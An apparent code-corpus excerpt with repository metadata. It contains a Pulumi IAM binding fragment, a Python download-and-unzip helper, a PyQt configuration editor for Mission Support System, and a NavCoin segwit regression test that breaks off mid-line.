""" return pulumi.get(self, "condition") @property @pulumi.getter def etag(self) -> pulumi.Output[str]: """ (Computed) The etag of the IAM policy. """ return pulumi.get(self, "etag") @property @pulumi.getter def member(self) -> pulumi.Output[str]: return pulumi.get(self, "member") @property @pulumi.getter def project(self) -> pulumi.Output[str]: """ The ID of the project in which the resource belongs. If it is not provided, the project will be parsed from the identifier of the parent resource. If no project is provided in the parent identifier and no project is specified, the provider project is used. """ return pulumi.get(self, "project") @property @pulumi.getter def role(self) -> pulumi.Output[str]: """ The role that should be applied. Only one `iap.WebIamBinding` can be used per role. Note that custom roles must be of the format `[projects|organizations]/{parent-name}/roles/{role-name}`. """ return pulumi.get(self, "role")
44.823024
454
0.642427
758164568d21bee6437ac5f3320f2028db46c6f5
972
py
Python
pycessing/download.py
kitao/pycessing
ab59dfbef7f52712e894f5b4d869c27f68bf3685
[ "MIT" ]
null
null
null
pycessing/download.py
kitao/pycessing
ab59dfbef7f52712e894f5b4d869c27f68bf3685
[ "MIT" ]
null
null
null
pycessing/download.py
kitao/pycessing
ab59dfbef7f52712e894f5b4d869c27f68bf3685
[ "MIT" ]
null
null
null
import os import sys import urllib2 def download(url, dest_dir): basename = os.path.basename(url) sys.stdout.write('download {0} ... '.format(basename)) sys.stdout.flush() filename = os.path.join(dest_dir, basename) if not os.path.exists(dest_dir): os.makedirs(dest_dir) with open(filename, 'wb') as f: f.write(urllib2.urlopen(url).read()) print 'done' return filename def unzip(filename): import zipfile dest_dir, basename = os.path.split(filename) sys.stdout.write('unzip {0} ... '.format(basename)) sys.stdout.flush() with zipfile.ZipFile(filename, 'r') as zf: zf.extractall(dest_dir) os.remove(filename) for root, dirs, files in os.walk(dest_dir): for name in files: if name.startswith('._'): os.remove(os.path.join(root, name)) print 'done' def url_to_filename(url, dest_dir): basename = os.path.basename(url) def makedirs(path): if not os.path.exists(path): os.makedirs(path)
19.836735
56
0.675926
e22fbc391dee37f699b73cbbf6301accce114438
32,051
py
Python
mslib/msui/editor.py
kawalpreettkaur/MSS
ee97789ddd320a4c47f4ceebaf72e792dc2b8d63
[ "Apache-2.0" ]
1
2021-10-05T16:23:43.000Z
2021-10-05T16:23:43.000Z
mslib/msui/editor.py
kawalpreettkaur/MSS
ee97789ddd320a4c47f4ceebaf72e792dc2b8d63
[ "Apache-2.0" ]
null
null
null
mslib/msui/editor.py
kawalpreettkaur/MSS
ee97789ddd320a4c47f4ceebaf72e792dc2b8d63
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- """ mslib.msui.editor ~~~~~~~~~~~~~~~~~~~~~~ config editor for mss_settings.json. This file is part of mss. :copyright: Copyright 2020 Vaibhav Mehra <veb7vmehra@gmail.com> :copyright: Copyright 2020-2021 by the mss team, see AUTHORS. :license: APACHE-2.0, see LICENSE for details. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import collections.abc import copy import fs import logging import json from mslib.msui.mss_qt import get_open_filename, get_save_filename, show_popup from mslib.msui.mss_qt import ui_configuration_editor_window as ui_conf from PyQt5 import QtWidgets, QtCore, QtGui from mslib.msui.constants import MSS_SETTINGS from mslib.msui.icons import icons from mslib.utils.config import MissionSupportSystemDefaultConfig as mss_default from mslib.utils.config import config_loader, dict_raise_on_duplicates_empty, merge_data from mslib.support.qt_json_view import delegate from mslib.support.qt_json_view.view import JsonView from mslib.support.qt_json_view.model import JsonModel from mslib.support.qt_json_view.datatypes import match_type, DataType, TypeRole, ListType InvalidityRole = TypeRole + 1 DummyRole = TypeRole + 2 default_options = config_loader(default=True) def get_root_index(index, parents=False): parent_list = [] while index.parent().isValid(): index = index.parent() parent_list.append(index) parent_list.reverse() if parents: return index, parent_list return index class JsonDelegate(delegate.JsonDelegate): def paint(self, painter, option, index): """Use method from the data type or fall back to the default.""" if index.column() == 0: source_model = index.model() if isinstance(source_model, QtCore.QAbstractProxyModel): source_model = source_model.sourceModel() data = source_model.serialize() # bold the key which has non-default value root_index, parents = get_root_index(index, parents=True) parents.append(index) key = root_index.data() if key in mss_default.list_option_structure or \ key in mss_default.dict_option_structure or \ key in mss_default.key_value_options: if root_index == index and data[key] != default_options[key]: option.font.setWeight(QtGui.QFont.Bold) elif key in mss_default.fixed_dict_options: model_data = data[key] default_data = default_options[key] for parent in parents[1:]: parent_data = parent.data() if isinstance(default_data, list): parent_data = int(parent.data()) model_data = model_data[parent_data] default_data = default_data[parent_data] if model_data != default_data: option.font.setWeight(QtGui.QFont.Bold) return super(JsonDelegate, self).paint(painter, option, index) type_ = index.data(TypeRole) if isinstance(type_, DataType): try: super(JsonDelegate, self).paint(painter, option, index) return type_.paint(painter, option, index) except NotImplementedError: pass return super(JsonDelegate, self).paint(painter, option, index) class JsonSortFilterProxyModel(QtCore.QSortFilterProxyModel): def filterAcceptsRow(self, source_row, source_parent): # check if an item is currently accepted accepted = super(JsonSortFilterProxyModel, self).filterAcceptsRow(source_row, source_parent) if accepted: return True # checking if parent is accepted (works only for indexes with depth 2) src_model = self.sourceModel() index = src_model.index(source_row, self.filterKeyColumn(), source_parent) has_parent = src_model.itemFromIndex(index).parent() if has_parent: parent_index = self.mapFromSource(has_parent.index()) return super(JsonSortFilterProxyModel, self).filterAcceptsRow(has_parent.row(), parent_index) return accepted class ConfigurationEditorWindow(QtWidgets.QMainWindow, ui_conf.Ui_ConfigurationEditorWindow): """MSUI configuration editor class. Provides user interface elements for editing mss_settings.json """ restartApplication = QtCore.pyqtSignal(name="restartApplication") def __init__(self, parent=None): super(ConfigurationEditorWindow, self).__init__(parent) self.setupUi(self) options = config_loader() self.path = MSS_SETTINGS self.last_saved = copy.deepcopy(options) self.optCb.addItem("All") for option in sorted(options.keys(), key=str.lower): self.optCb.addItem(option) # Create view and place in parent widget self.view = JsonView() self.view.setItemDelegate(JsonDelegate()) self.view.setSelectionMode(QtWidgets.QAbstractItemView.ExtendedSelection) self.jsonWidget.setLayout(QtWidgets.QVBoxLayout()) self.jsonWidget.layout().setContentsMargins(0, 0, 0, 0) self.jsonWidget.layout().addWidget(self.view) # Create proxy model for filtering self.proxy_model = JsonSortFilterProxyModel() self.json_model = JsonModel(data=options, editable_keys=True, editable_values=True) self.json_model.setHorizontalHeaderLabels(['Option', 'Value']) # Set view model self.proxy_model.setSourceModel(self.json_model) self.view.setModel(self.proxy_model) # Setting proxy model and view attributes self.proxy_model.setFilterKeyColumn(0) # Add actions to toolbar self.import_file_action = QtWidgets.QAction( QtGui.QIcon(icons("config_editor", "Folder-new.svg")), "Import config", self) self.import_file_action.setStatusTip("Import an external configuration file") self.toolBar.addAction(self.import_file_action) self.save_file_action = QtWidgets.QAction( QtGui.QIcon(icons("config_editor", "Document-save.svg")), "Save config", self) self.save_file_action.setStatusTip("Save current configuration") self.toolBar.addAction(self.save_file_action) self.export_file_action = QtWidgets.QAction( QtGui.QIcon(icons("config_editor", "Document-save-as.svg")), "Export config", self) self.export_file_action.setStatusTip("Export current configuration") self.toolBar.addAction(self.export_file_action) # Button signals self.optCb.currentIndexChanged.connect(self.set_option_filter) self.addOptBtn.clicked.connect(self.add_option_handler) self.removeOptBtn.clicked.connect(self.remove_option_handler) self.restoreDefaultsBtn.clicked.connect(self.restore_defaults) self.moveUpTb.clicked.connect(lambda: self.move_option(move=1)) self.moveDownTb.clicked.connect(lambda: self.move_option(move=-1)) # File action signals self.import_file_action.triggered.connect(self.import_config) self.save_file_action.triggered.connect(self.save_config) self.export_file_action.triggered.connect(self.export_config) # View/Model signals self.view.selectionModel().selectionChanged.connect(self.tree_selection_changed) self.json_model.dataChanged.connect(self.update_view) # set behaviour of widgets self.moveUpTb.hide() self.moveDownTb.hide() self.moveUpTb.setAutoRaise(True) self.moveUpTb.setArrowType(QtCore.Qt.UpArrow) self.moveUpTb.setToolButtonStyle(QtCore.Qt.ToolButtonIconOnly) self.moveDownTb.setAutoRaise(True) self.moveDownTb.setArrowType(QtCore.Qt.DownArrow) self.moveDownTb.setToolButtonStyle(QtCore.Qt.ToolButtonIconOnly) self.moveUpTb.setEnabled(False) self.moveDownTb.setEnabled(False) self.addOptBtn.setEnabled(False) self.removeOptBtn.setEnabled(False) self.restoreDefaultsBtn.setEnabled(False) # set tooltip and make keys non-editable self.set_noneditable_items(QtCore.QModelIndex()) # json view attributes self.view.setAlternatingRowColors(True) self.view.setColumnWidth(0, self.view.width() // 2) # Add invalidity roles and update status of keys self.update_view() self.restart_on_save = True def set_noneditable_items(self, parent): for r in range(self.json_model.rowCount(parent)): index = self.json_model.index(r, 0, parent) item = self.json_model.itemFromIndex(index) item.setEditable(False) if item.text() in mss_default.fixed_dict_options: self.set_noneditable_items(index) if item.text() in mss_default.config_descriptions: item.setData(mss_default.config_descriptions[item.text()], QtCore.Qt.ToolTipRole) def tree_selection_changed(self, selected, deselected): """Enable/Disable appropriate buttons based on selection in treeview """ selection = self.view.selectionModel().selectedRows() # if no selection add, remove, restore_defaults, move = [False] * 4 if len(selection) == 1: index = selection[0] if not index.parent().isValid(): move = True root_index = get_root_index(index) if root_index.data() not in mss_default.fixed_dict_options + mss_default.key_value_options: add, move = True, True # display error message if key has invalid values if not index.parent().isValid(): root_index = get_root_index(index) source_index = self.proxy_model.mapToSource(root_index) item = self.json_model.itemFromIndex(source_index) if any(item.data(InvalidityRole)): invalidity = item.data(InvalidityRole) errors = {"empty": invalidity[0], "duplicate": invalidity[1], "invalid": invalidity[2]} msg = ", ".join([key for key in errors if errors[key]]) msg += " values found" self.statusbar.showMessage(msg) elif item.data(DummyRole): self.statusbar.showMessage("Dummy values found") else: self.statusbar.showMessage("") if len(selection) >= 1: restore_defaults = True for index in selection: index = get_root_index(index) if index.data() not in mss_default.fixed_dict_options + mss_default.key_value_options \ and self.proxy_model.rowCount(index) > 0: remove = True break self.addOptBtn.setEnabled(add) self.removeOptBtn.setEnabled(remove) self.restoreDefaultsBtn.setEnabled(restore_defaults) self.moveUpTb.setEnabled(move) self.moveDownTb.setEnabled(move) def update_view(self): """ Set InvalidRole and DummyRole for all root items in the treeview and highlight appropriately. InvalidRole -> Boolean list indicating if item has Empty, Duplicate, Invalid values DummyRole -> Boolean value indicating if item has dummy value """ source_model = self.json_model data = source_model.serialize() parent = QtCore.QModelIndex() for r in range(source_model.rowCount(parent)): root_index = source_model.index(r, 0, parent) root_item = source_model.itemFromIndex(root_index) empty, duplicate, invalid, dummy = [False] * 4 color = QtCore.Qt.transparent key = root_index.data() if key in mss_default.dict_option_structure: child_keys = set() rows = source_model.rowCount(root_index) for row in range(rows): child_key_data = source_model.index(row, 0, root_index).data() child_keys.add(child_key_data) if child_key_data == "": empty = True # check for dummy values default = mss_default.dict_option_structure[key] values_dict = data[key] for value in values_dict: if value in default: if default[value] == values_dict[value]: dummy = True color = QtCore.Qt.gray break # condition for checking duplicate and empty keys if len(child_keys) != rows or empty: duplicate = True color = QtCore.Qt.red elif key in mss_default.list_option_structure: values_list = data[key] # check if any dummy values if any([value == mss_default.list_option_structure[key][0] for value in values_list]): dummy = True color = QtCore.Qt.gray # check if any empty values if any([value == "" for value in values_list]): empty = True color = QtCore.Qt.red # check if any duplicate values if len(set(values_list)) != len(values_list): duplicate = True color = QtCore.Qt.red elif key == 'filepicker_default': if data[key] not in ['default', 'qt', 'fs']: invalid = True color = QtCore.Qt.red # set invalidityroles and dummyrole for key root_item.setData([empty, duplicate, invalid], InvalidityRole) root_item.setData(dummy, DummyRole) # set color for column 1 item = source_model.itemFromIndex(root_index) item.setBackground(color) # set color for column 2 source_index = source_model.index(r, 1, parent) item = source_model.itemFromIndex(source_index) item.setBackground(color) def set_option_filter(self, index): # By default FilterKeyColumn of the proxy model is set to 0 if self.optCb.currentText() == "All": self.proxy_model.setFilterRegExp("") return self.proxy_model.setFilterRegExp(QtCore.QRegExp(f"^{self.optCb.currentText()}$")) self.view.expandAll() def add_option_handler(self): selection = self.view.selectionModel().selectedRows() if len(selection) == 0 or len(selection) > 1: logging.debug("zero or multiple selections while trying to add new value") self.statusbar.showMessage("Please select one option to add new value") return selected_index = get_root_index(selection[0]) option = selected_index.data() parent = QtCore.QModelIndex() for r in range(self.json_model.rowCount(parent)): index = self.json_model.index(r, 0, parent) item = self.json_model.itemFromIndex(index) if index.data() == option: if option in mss_default.fixed_dict_options + mss_default.key_value_options: # Cannot add options to fixed structure options self.statusbar.showMessage( "Option already exists. Please change value to your preference or restore to default.") return elif option in mss_default.dict_option_structure: # Append dummy value dict to options having a dictionary structure json_data = mss_default.dict_option_structure[option] type_ = match_type(json_data) type_.next(model=self.json_model, data=json_data, parent=item) elif option in mss_default.list_option_structure: # Append dummy value to options having a list structure json_data = mss_default.list_option_structure[option] type_ = match_type(json_data) type_.next(model=self.json_model, data=json_data, parent=item) # increase row count in view rows = self.json_model.rowCount(index) - 1 new_item = self.json_model.itemFromIndex(self.json_model.index(rows, 0, index)) new_item.setData(rows, QtCore.Qt.DisplayRole) self.statusbar.showMessage("") # expand root item proxy_index = self.proxy_model.mapFromSource(index) self.view.expand(proxy_index) # expand, scroll to and select new item rows = self.json_model.rowCount(index) - 1 new_index = self.json_model.index(rows, 0, index) proxy_index = self.proxy_model.mapFromSource(new_index) self.view.expand(proxy_index) self.view.scrollTo(proxy_index) self.view.selectionModel().select( proxy_index, QtCore.QItemSelectionModel.ClearAndSelect | QtCore.QItemSelectionModel.Rows) logging.debug("Added new value for %s" % option ) self.update_view() break def remove_option_handler(self): selection = self.view.selectionModel().selectedRows() if len(selection) == 0: logging.debug("zero selections while trying to remove option") self.statusbar.showMessage("Please select one/more options to remove") return # Collect all removable indexes from selected items non_removable = [] removable_indexes = {} for index in selection: if not index.parent().isValid(): if index.data() not in mss_default.fixed_dict_options + mss_default.key_value_options: removable_indexes[index] = set(range(self.proxy_model.rowCount(index))) else: # cannot remove root item non_removable.append(index) else: # find penultimate option key while index.parent().parent().isValid(): index = index.parent() root = index.parent() # enter only if root option not in fixed dictionary / key value options if root.data() not in mss_default.fixed_dict_options + mss_default.key_value_options: if root in removable_indexes: removable_indexes[root].add(index.row()) else: removable_indexes[root] = set([index.row()]) else: non_removable.append(index) if removable_indexes == {} and non_removable != []: self.statusbar.showMessage("Default options are not removable.") return # ToDo add confirmation dialog here options = "\n".join([index.data() for index in removable_indexes]) logging.debug("Attempting to remove the following options\n%s" % options) self.view.selectionModel().clearSelection() for index in removable_indexes: rows = sorted(list(removable_indexes[index])) for count, row in enumerate(rows): row = row - count self.proxy_model.removeRow(row, parent=index) # fix row number in list type options source_index = self.proxy_model.mapToSource(index) source_item = self.json_model.itemFromIndex(source_index) if isinstance(source_item.data(QtCore.Qt.UserRole + 1), ListType): for r in range(self.json_model.rowCount(source_index)): child_index = self.json_model.index(r, 0, source_index) item = self.json_model.itemFromIndex(child_index) item.setData(r, QtCore.Qt.DisplayRole) self.statusbar.showMessage("Successfully removed values selected options") self.update_view() def restore_defaults(self): def update(data, option, value): """Function to update dict at a depth""" for k, v in data.items(): if k == option: data[k] = value break if isinstance(v, collections.abc.Mapping): data[k] = update(data.get(k, {}), option, value) return data selection = self.view.selectionModel().selectedRows() if len(selection) == 0: logging.debug("no selections while trying to restore defaults") self.statusbar.showMessage("Please select one/more options to restore defaults") return # get list of distinct indexes to restore model_data = self.json_model.serialize() selected_indexes = set() for index in selection: root_index, parent_list = get_root_index(index, parents=True) added = False data = model_data for parent in parent_list + [index]: data = data[parent.data()] if isinstance(data, list): added = True selected_indexes.add(parent) break if not added: selected_indexes.add(index) # ToDo add confirmation dialog here options = "\n".join([index.data() for index in selected_indexes]) logging.debug("Attempting to restore defaults for the following options\n%s" % options) for index in selected_indexes: # check if root option and present in mss_default.key_value_options if not index.parent().isValid() and index.data() in mss_default.key_value_options: value_index = self.json_model.index(index.row(), 1, QtCore.QModelIndex()) value_item = self.json_model.itemFromIndex(value_index) value_item.setData(default_options[index.data()], QtCore.Qt.DisplayRole) continue root_index, parent_list = get_root_index(index, parents=True) option = root_index.data() model_data = self.json_model.serialize() if option in mss_default.fixed_dict_options: if index == root_index: json_data = default_options[option] else: key = None value = copy.deepcopy(default_options) for parent in parent_list + [index]: parent_data = parent.data() if isinstance(value, list): break key = parent_data value = value[parent_data] data = copy.deepcopy(model_data[option]) json_data = update(data, key, value) else: json_data = default_options[option] if model_data[option] == json_data: continue # remove all rows for row in range(self.proxy_model.rowCount(root_index)): self.proxy_model.removeRow(0, parent=root_index) # add default values source_index = self.proxy_model.mapToSource(root_index) source_item = self.json_model.itemFromIndex(source_index) type_ = match_type(json_data) type_.next(model=self.json_model, data=json_data, parent=source_item) self.statusbar.showMessage("Defaults restored for selected options") self.view.clearSelection() self.update_view() def import_config(self): file_path = get_open_filename(self, "Import config", "", ";;".join(["JSON Files (*.json)", "All Files (*.*)"])) if not file_path: return # load data from selected file dir_name, file_name = fs.path.split(file_path) with fs.open_fs(dir_name) as _fs: if _fs.exists(file_name): file_content = _fs.readtext(file_name) try: json_file_data = json.loads(file_content, object_pairs_hook=dict_raise_on_duplicates_empty) except json.JSONDecodeError as e: show_popup(self, "Error while loading file", e) logging.error("Error while loading json file %s" % e) return except ValueError as e: show_popup(self, "Invalid keys detected", e) logging.error("Error while loading json file %s" % e) return if json_file_data: json_model_data = self.json_model.serialize() options = merge_data(copy.deepcopy(json_model_data), json_file_data) if options == json_model_data: self.statusbar.showMessage("No option with new values found") return # replace existing data with new data self.json_model.init(options, editable_keys=True, editable_values=True) self.view.setColumnWidth(0, self.view.width() // 2) self.set_noneditable_items(QtCore.QModelIndex()) self.update_view() self.statusbar.showMessage("Successfully imported config") logging.debug("Imported new config data from file") else: self.statusbar.showMessage("No data found in the file") logging.debug("No data found in the file, using existing settings") def _save_to_path(self, filename): self.last_saved = self.json_model.serialize() json_data = copy.deepcopy(self.last_saved) save_data = copy.deepcopy(self.last_saved) for key in json_data: if json_data[key] == default_options[key] or json_data[key] == {} or json_data[key] == []: del save_data[key] dir_name, file_name = fs.path.split(filename) with fs.open_fs(dir_name) as _fs: _fs.writetext(file_name, json.dumps(save_data, indent=4)) def validate_data(self): invalid, dummy = False, False parent = QtCore.QModelIndex() for r in range(self.json_model.rowCount(parent)): index = self.json_model.index(r, 0, parent) item = self.json_model.itemFromIndex(index) invalid |= any(item.data(InvalidityRole)) dummy |= item.data(DummyRole) return invalid, dummy def check_modified(self): return not self.last_saved == self.json_model.serialize() def save_config(self): invalid, dummy = self.validate_data() if invalid: show_popup( self, "Invalid values detected", "Please correct the invalid values (keys colored in red) to be able to save.") self.statusbar.showMessage("Please correct the values and try saving again") return False if dummy and self.check_modified(): ret = QtWidgets.QMessageBox.warning( self, self.tr("Dummy values detected"), self.tr("Dummy values detected (keys colored in gray.)\n" "Since they are dummy values you might face issues later on while working." "\n\nDo you still want to continue to save?"), QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No, QtWidgets.QMessageBox.No) if ret == QtWidgets.QMessageBox.No: self.statusbar.showMessage("Please correct the values and try saving") return False if self.check_modified(): if self.restart_on_save: ret = QtWidgets.QMessageBox.warning( self, self.tr("Mission Support System"), self.tr("Do you want to restart the application?\n" "(This is necessary to apply changes)\n\n" "Please note that clicking 'No' will not save the current configuration"), QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No, QtWidgets.QMessageBox.No) if ret == QtWidgets.QMessageBox.Yes: logging.debug("saving config file to: %s and restarting MSS" % self.path) self._save_to_path(self.path) self.restartApplication.emit() self.restart_on_save = False self.close() else: return self.restart_on_save = True logging.debug("saving config file to: %s" % self.path) self._save_to_path(self.path) else: self.statusbar.showMessage("No values changed") return True def export_config(self): invalid, dummy = self.validate_data() if invalid: show_popup( self, "Invalid values detected", "Please correct the invalid values (keys colored in red) to be able to save.") self.statusbar.showMessage("Please correct the values and try exporting") return False if self.json_model.serialize() == default_options: msg = """Since the current configuration matches the default configuration, \ only an empty json file would be exported.\nDo you still want to continue?""" ret = QtWidgets.QMessageBox.warning( self, self.tr("Mission Support System"), self.tr(msg), QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No, QtWidgets.QMessageBox.No) if ret == QtWidgets.QMessageBox.No: return path = get_save_filename(self, "Export configuration", "mss_settings", "JSON files (*.json)") if path: self._save_to_path(path) def closeEvent(self, event): msg = "" invalid, dummy = self.validate_data() if invalid: msg = self.tr("Invalid keys/values found in config.\nDo you want to rectify and save changes?") elif dummy and not self.check_modified: msg = self.tr("Dummy keys/values found in config.\nDo you want to rectify and save changes?") elif self.check_modified(): msg = self.tr( "Save Changes to default mss_settings.json?\nYou need to restart the gui for changes to take effect.") if msg != "": ret = QtWidgets.QMessageBox.warning( self, self.tr("Mission Support System"), self.tr(msg), QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No, QtWidgets.QMessageBox.No) if ret == QtWidgets.QMessageBox.Yes: if not self.save_config(): event.ignore() return elif self.restart_on_save: ret = QtWidgets.QMessageBox.warning( self, self.tr("Mission Support System"), self.tr("Do you want to close the config editor?"), QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No, QtWidgets.QMessageBox.No) if ret == QtWidgets.QMessageBox.No: event.ignore() return event.accept()
45.205924
119
0.608062
69a6f87cbb67029a5ad349cf5638bd93652e9ff8
12,234
py
Python
qa/rpc-tests/segwit.py
supertref/navcoin-core
cc6fd1c9661fcbd3b82c8f2506c0f863da43b392
[ "MIT" ]
1
2020-08-28T02:32:47.000Z
2020-08-28T02:32:47.000Z
qa/rpc-tests/segwit.py
supertref/navcoin-core
cc6fd1c9661fcbd3b82c8f2506c0f863da43b392
[ "MIT" ]
3
2019-07-18T02:10:02.000Z
2019-08-28T22:09:31.000Z
qa/rpc-tests/segwit.py
supertref/navcoin-core
cc6fd1c9661fcbd3b82c8f2506c0f863da43b392
[ "MIT" ]
2
2020-09-06T20:02:00.000Z
2020-11-19T18:47:42.000Z
#!/usr/bin/env python3 # Copyright (c) 2016 The Bitcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. # # Test the SegWit changeover logic # from test_framework.test_framework import NavCoinTestFramework from test_framework.util import * from test_framework.mininode import sha256, ripemd160 import os import shutil NODE_0 = 0 NODE_1 = 1 NODE_2 = 2 WIT_V0 = 0 WIT_V1 = 1 def witness_script(version, pubkey): if (version == 0): pubkeyhash = bytes_to_hex_str(ripemd160(sha256(hex_str_to_bytes(pubkey)))) pkscript = "0014" + pubkeyhash elif (version == 1): # 1-of-1 multisig scripthash = bytes_to_hex_str(sha256(hex_str_to_bytes("5121" + pubkey + "51ae"))) pkscript = "0020" + scripthash else: assert("Wrong version" == "0 or 1") return pkscript def addlength(script): scriptlen = format(len(script)//2, 'x') assert(len(scriptlen) == 2) return scriptlen + script def create_witnessprogram(version, node, utxo, pubkey, encode_p2sh, amount): pkscript = witness_script(version, pubkey); if (encode_p2sh): p2sh_hash = bytes_to_hex_str(ripemd160(sha256(hex_str_to_bytes(pkscript)))) pkscript = "a914"+p2sh_hash+"87" inputs = [] outputs = {} inputs.append({ "txid" : utxo["txid"], "vout" : utxo["vout"]} ) DUMMY_P2SH = "2MySexEGVzZpRgNQ1JdjdP5bRETznm3roQ2" # P2SH of "OP_1 OP_DROP" outputs[DUMMY_P2SH] = amount tx_to_witness = node.createrawtransaction(inputs,outputs) #replace dummy output with our own tx_to_witness = tx_to_witness[0:110] + addlength(pkscript) + tx_to_witness[-8:] return tx_to_witness def send_to_witness(version, node, utxo, pubkey, encode_p2sh, amount, sign=True, insert_redeem_script=""): tx_to_witness = create_witnessprogram(version, node, utxo, pubkey, encode_p2sh, amount) if (sign): signed = node.signrawtransaction(tx_to_witness) assert("errors" not in signed or len(["errors"]) == 0) return node.sendrawtransaction(signed["hex"]) else: if (insert_redeem_script): tx_to_witness = tx_to_witness[0:82] + addlength(insert_redeem_script) + tx_to_witness[84:] return node.sendrawtransaction(tx_to_witness) def getutxo(txid): utxo = {} utxo["vout"] = 0 utxo["txid"] = txid return utxo def find_unspent(node, min_value): for utxo in node.listunspent(): if utxo['amount'] >= min_value: return utxo class SegWitTest(NavCoinTestFramework): def setup_chain(self): print("Initializing test directory "+self.options.tmpdir) initialize_chain_clean(self.options.tmpdir, 3) def setup_network(self): self.nodes = [] self.nodes.append(start_node(0, self.options.tmpdir, ["-logtimemicros", "-debug", "-walletprematurewitness"])) self.nodes.append(start_node(1, self.options.tmpdir, ["-logtimemicros", "-debug", "-blockversion=4", "-promiscuousmempoolflags=517", "-prematurewitness", "-walletprematurewitness"])) self.nodes.append(start_node(2, self.options.tmpdir, ["-logtimemicros", "-debug", "-blockversion=536870915", "-promiscuousmempoolflags=517", "-prematurewitness", "-walletprematurewitness"])) connect_nodes(self.nodes[1], 0) connect_nodes(self.nodes[2], 1) connect_nodes(self.nodes[0], 2) self.is_network_split = False self.sync_all() def success_mine(self, node, txid, sign, redeem_script=""): send_to_witness(1, node, getutxo(txid), self.pubkey[0], False, Decimal("49.998"), sign, redeem_script) block = node.generate(1) assert_equal(len(node.getblock(block[0])["tx"]), 2) sync_blocks(self.nodes) def skip_mine(self, node, txid, sign, redeem_script=""): send_to_witness(1, node, getutxo(txid), self.pubkey[0], False, Decimal("49.998"), sign, redeem_script) block = node.generate(1) assert_equal(len(node.getblock(block[0])["tx"]), 1) sync_blocks(self.nodes) def fail_accept(self, node, txid, sign, redeem_script=""): try: send_to_witness(1, node, getutxo(txid), self.pubkey[0], False, Decimal("49.998"), sign, redeem_script) except JSONRPCException as exp: assert(exp.error["code"] == -26) else: raise AssertionError("Tx should not have been accepted") def fail_mine(self, node, txid, sign, redeem_script=""): send_to_witness(1, node, getutxo(txid), self.pubkey[0], False, Decimal("49.998"), sign, redeem_script) try: node.generate(1) except JSONRPCException as exp: assert(exp.error["code"] == -1) else: raise AssertionError("Created valid block when TestBlockValidity should have failed") sync_blocks(self.nodes) def run_test(self): self.nodes[0].generate(161) #block 161 print("Verify sigops are counted in GBT with pre-BIP141 rules before the fork") txid = self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 1) tmpl = self.nodes[0].getblocktemplate({}) assert(tmpl['sigoplimit'] == 20000) assert(tmpl['transactions'][0]['hash'] == txid) assert(tmpl['transactions'][0]['sigops'] == 2) tmpl = self.nodes[0].getblocktemplate({'rules':['segwit']}) assert(tmpl['sigoplimit'] == 20000) assert(tmpl['transactions'][0]['hash'] == txid) assert(tmpl['transactions'][0]['sigops'] == 2) self.nodes[0].generate(1) #block 162 balance_presetup = self.nodes[0].getbalance() self.pubkey = [] p2sh_ids = [] # p2sh_ids[NODE][VER] is an array of txids that spend to a witness version VER pkscript to an address for NODE embedded in p2sh wit_ids = [] # wit_ids[NODE][VER] is an array of txids that spend to a witness version VER pkscript to an address for NODE via bare witness for i in range(3): newaddress = self.nodes[i].getnewaddress() self.pubkey.append(self.nodes[i].validateaddress(newaddress)["pubkey"]) multiaddress = self.nodes[i].addmultisigaddress(1, [self.pubkey[-1]]) self.nodes[i].addwitnessaddress(newaddress) self.nodes[i].addwitnessaddress(multiaddress) p2sh_ids.append([]) wit_ids.append([]) for v in range(2): p2sh_ids[i].append([]) wit_ids[i].append([]) for i in range(5): for n in range(3): for v in range(2): wit_ids[n][v].append(send_to_witness(v, self.nodes[0], find_unspent(self.nodes[0], 50), self.pubkey[n], False, Decimal("49.999"))) p2sh_ids[n][v].append(send_to_witness(v, self.nodes[0], find_unspent(self.nodes[0], 50), self.pubkey[n], True, Decimal("49.999"))) self.nodes[0].generate(1) #block 163 sync_blocks(self.nodes) # Make sure all nodes recognize the transactions as theirs assert_equal(self.nodes[0].getbalance(), balance_presetup - 60*50 + 20*Decimal("49.999") + 50) assert_equal(self.nodes[1].getbalance(), 20*Decimal("49.999")) assert_equal(self.nodes[2].getbalance(), 20*Decimal("49.999")) self.nodes[0].generate(260) #block 423 sync_blocks(self.nodes) print("Verify default node can't accept any witness format txs before fork") # unsigned, no scriptsig self.fail_accept(self.nodes[0], wit_ids[NODE_0][WIT_V0][0], False) self.fail_accept(self.nodes[0], wit_ids[NODE_0][WIT_V1][0], False) self.fail_accept(self.nodes[0], p2sh_ids[NODE_0][WIT_V0][0], False) self.fail_accept(self.nodes[0], p2sh_ids[NODE_0][WIT_V1][0], False) # unsigned with redeem script self.fail_accept(self.nodes[0], p2sh_ids[NODE_0][WIT_V0][0], False, addlength(witness_script(0, self.pubkey[0]))) self.fail_accept(self.nodes[0], p2sh_ids[NODE_0][WIT_V1][0], False, addlength(witness_script(1, self.pubkey[0]))) # signed self.fail_accept(self.nodes[0], wit_ids[NODE_0][WIT_V0][0], True) self.fail_accept(self.nodes[0], wit_ids[NODE_0][WIT_V1][0], True) self.fail_accept(self.nodes[0], p2sh_ids[NODE_0][WIT_V0][0], True) self.fail_accept(self.nodes[0], p2sh_ids[NODE_0][WIT_V1][0], True) print("Verify witness txs are skipped for mining before the fork") self.skip_mine(self.nodes[2], wit_ids[NODE_2][WIT_V0][0], True) #block 424 self.skip_mine(self.nodes[2], wit_ids[NODE_2][WIT_V1][0], True) #block 425 self.skip_mine(self.nodes[2], p2sh_ids[NODE_2][WIT_V0][0], True) #block 426 self.skip_mine(self.nodes[2], p2sh_ids[NODE_2][WIT_V1][0], True) #block 427 # TODO: An old node would see these txs without witnesses and be able to mine them print("Verify unsigned bare witness txs in versionbits-setting blocks are valid before the fork") self.success_mine(self.nodes[2], wit_ids[NODE_2][WIT_V0][1], False) #block 428 self.success_mine(self.nodes[2], wit_ids[NODE_2][WIT_V1][1], False) #block 